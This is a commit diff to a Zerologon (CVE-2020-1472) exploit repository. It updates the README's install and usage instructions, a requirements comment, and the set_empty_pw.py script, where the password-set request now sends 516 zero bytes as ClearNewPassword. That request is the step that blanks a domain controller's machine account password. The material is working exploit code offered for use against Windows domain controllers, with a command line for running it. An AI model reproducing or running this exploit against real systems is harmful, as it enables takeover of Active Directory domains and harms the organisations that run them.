Handle the impacket ClearNewPassword changes

README.md

@@ -2,7 +2,7 @@
 
 Exploit code based on https://www.secura.com/blog/zero-logon and https://github.com/SecuraBV/CVE-2020-1472. Original research and scanner by Secura, modifications by RiskSense Inc.
 
-To exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3 or newer. Then, do:
+To exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/b867b21 or newer. Then, do:
 
 ```
 python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

requirements.txt

@@ -4,7 +4,7 @@ cryptography==3.1
 dnspython==2.0.0
 Flask==1.1.2
 future==0.18.2
-#impacket==0.9.21 # install impacket from https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3
+#impacket==0.9.21 https://github.com/SecureAuthCorp/impacket/commit/b867b21
 itsdangerous==1.1.0
 Jinja2==2.11.2
 ldap3==2.8

set_empty_pw.py

@@ -90,9 +90,7 @@ def try_zero_authenticate(dc_handle, dc_ip, target_computer):
       request["Authenticator"] = authenticator
       #request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
       #request['ReturnAuthenticator']['Timestamp'] = 0
-      request["ClearNewPassword"] = nrpc.NL_TRUST_PASSWORD()
-      request["ClearNewPassword"]["Buffer"] = b'\x00'*512
-      request["ClearNewPassword"]["Length"] = 0 # It winds up being 516 bytes mentioned in the Secur whitepaper because this is 4 bytes
+      request["ClearNewPassword"] = b"\x00"*516
       resp = rpc_con.request(request)
       resp.dump()